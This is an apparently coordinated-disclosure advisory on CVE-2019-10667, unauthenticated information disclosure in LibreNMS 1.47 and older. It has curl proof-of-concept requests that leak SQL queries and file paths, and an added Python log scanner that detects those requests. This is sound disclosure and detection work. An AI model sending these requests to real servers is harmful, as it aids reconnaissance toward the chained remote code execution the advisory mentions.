LibreNMS Information Disclosure Vulnerability

15 July 2019

 

CVE

CVE-2019-10667

CVSS SCORE

5.3 (AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N)

XID

XL-19-018

AFFECTED VENDORS

LibreNMS (www.librenms.org)

CREDIT

Eldar Marcussen - xen1thLabs - Software Labs

 

VULNERABILITY SUMMARY

LibreNMS is affected by a number of information disclosure vulnerabilities that allow an attacker to fingerprint the exact code version installed and to disclose local file paths. These vulnerabilities can be combined with other vulnerabilities identified by xen1thLabs to achieve unauthenticated remote code execution.

 

TECHNICAL DETAILS

Several pages within LibreNMS disclose information to unauthenticated attackers, usually when “debug=1” is added to the query string. The information disclosed typically includes SQL queries, database performance stats and local file paths.

 

PROOF OF CONCEPT

$ curl 'https://host/pages/about.inc.php'

Figure 1: About library script missing the authentication check

$ curl 'https://host/legacy_index.php?debug=1'

SQL[select * from `plugins` where `plugin_active` = ? [1] 0.45ms]
Fatal error: Uncaught Error: Class 'Auth' not found in /opt/librenms/html/legacy_index.php:164 Stack trace: #0 {main} thrown in /opt/librenms/html/legacy_index.php on line 164
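
The two request patterns shown above (a "debug" query parameter and a direct request to a pages/*.inc.php include script) can be hunted for in web server access logs. The following Python sketch is an added example, not part of the original advisory or of LibreNMS; the combined log format, the function names and the sample log entries are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Assumed log format: Apache/nginx "combined"; only the needed fields are captured.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)
# Include scripts under pages/ are not meant to be requested directly.
INCLUDE_RE = re.compile(r"/pages/[^/]+\.inc\.php$")

def classify(target):
    """Return the advisory patterns a request target matches (may be empty)."""
    url = urlsplit(target)
    reasons = []
    # parse_qs percent-decodes names and values, so debug=%31 counts as debug=1.
    values = parse_qs(url.query, keep_blank_values=True).get("debug", [])
    if any(v not in ("", "0") for v in values):
        reasons.append("debug-parameter")
    if INCLUDE_RE.search(unquote(url.path)):
        reasons.append("direct-include-request")
    return reasons

def scan(lines):
    """Return (client_ip, target, status, reasons) for every matching entry."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a combined-format request line
        reasons = classify(m.group("target"))
        if reasons:
            hits.append((m.group("ip"), m.group("target"),
                         int(m.group("status")), reasons))
    return hits

# Constructed sample entries (documentation IP ranges), not real traffic.
SAMPLE_LOG = [
    '192.0.2.10 - - [15/Jul/2019:10:00:01 +0000] "GET /legacy_index.php?debug=1 HTTP/1.1" 500 412 "-" "curl/7.64.0"',
    '192.0.2.10 - - [15/Jul/2019:10:00:02 +0000] "GET /pages/about.inc.php HTTP/1.1" 200 2310 "-" "curl/7.64.0"',
    '198.51.100.7 - - [15/Jul/2019:10:00:03 +0000] "GET /overview HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [15/Jul/2019:10:00:04 +0000] "GET /legacy_index.php?debug=%31&x=1 HTTP/1.1" 500 412 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [15/Jul/2019:10:00:05 +0000] "GET /devices?debug=0 HTTP/1.1" 200 900 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```

Hits from clients with no authenticated session are the ones worth triaging first; correlating with session data is outside what this sketch does.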

 

AFFECTED SYSTEMS

LibreNMS 1.47 and older

SOLUTION

Upgrade to the latest version of LibreNMS

DISCLOSURE TIMELINE

26/03/2019 - Contacted LibreNMS developer requesting disclosure coordination

28/03/2019 - Provided vulnerability details

16/04/2019 - Version 1.50.1 released which resolves this issue

15/07/2019 - xen1thLabs public disclosure